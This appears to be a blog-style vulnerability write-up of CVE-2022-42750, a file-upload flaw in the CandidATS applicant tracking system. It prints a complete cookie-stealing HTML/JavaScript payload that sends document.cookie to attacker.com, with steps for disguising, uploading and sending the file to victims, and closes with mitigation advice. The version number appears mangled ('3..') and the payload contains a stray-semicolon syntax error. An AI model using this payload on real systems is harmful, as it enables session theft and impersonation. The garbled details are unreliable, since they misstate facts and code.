CandidATS, a popular open-source applicant tracking system, is widely used by recruiters and businesses to manage their hiring process. A serious vulnerability (CVE-2022-42750) has been found in CandidATS version 3.., which allows an external attacker to steal the cookie of arbitrary users. This security vulnerability is caused due to the application's inability to properly validate the files uploaded by a user.

This long-read post aims to provide an in-depth analysis of this vulnerability, including the exploit details, code snippets, and links to original references.

Vulnerability Details

The main issue in CandidATS v3.. lies in its poor validation of user-uploaded files, particularly when it comes to handling file extensions. An attacker can upload a malicious HTML file with a disguised file extension, which CandidATS will then store without validating its content.

When a user visits the link containing the malicious file, their browser will execute the malicious code, ultimately leading to the theft of their cookies. With these stolen cookies, an attacker can impersonate that user within the CandidATS application.

Exploit Process

1. The attacker starts by preparing a malicious HTML file that contains JavaScript code to steal the user's cookie. Here's a simple example of such a file:

<!DOCTYPE html>
<html>
<head>
  <title>Malicious File</title>
  <script>
    function stealCookie() {
      var xhr = new XMLHttpRequest();
      xhr.open('POST', 'https://attacker.com/cookie';, true);
      xhr.setRequestHeader('Content-Type', 'text/plain');
      xhr.send(document.cookie);
    }
    stealCookie();
  </script>
</head>
<body>
  This is a malicious file for CVE-2022-42750 exploit demonstration.
</body>
</html>

In this example, the JavaScript code sends the stolen cookie to the attacker's server at https://attacker.com/cookie.

2. The attacker then disguises the malicious HTML file by changing its extension. One way to achieve this is by simply appending a fake extension, e.g., changing "malicious.html" to "malicious.html.jpg".

3. With the file prepared, the attacker now uploads the malicious file to CandidATS using any file upload functionality provided by the platform. Since the application fails to properly validate file types, the disguised HTML file will be successfully uploaded and stored on the server.

4. The attacker sends the direct link to the stored malicious file to the targeted user(s) via email or other communication methods. When an unsuspecting user clicks on the link, their browser will render the HTML file and execute the embedded JavaScript code, allowing the attacker to steal their cookies.

References

- Original Advisory by ISSR Lab
- NIST National Vulnerability Database (NVD) Entry
- Exploit Database Entry

To protect yourself against this vulnerability

1. Update your CandidATS installation to the latest version, as the developers might have already addressed this issue in subsequent releases.
2. Implement proper file validation mechanisms in your application, e.g., checking both file extensions and MIME types, to prevent unauthorized file uploads.
3. Restrict access to user-uploaded files by implementing access controls, such as session-based authentication or API key authentication, to prevent unauthorized users from accessing sensitive data.

Timeline

Published on: 11/03/2022 18:15:00 UTC
Last modified on: 11/04/2022 15:04:00 UTC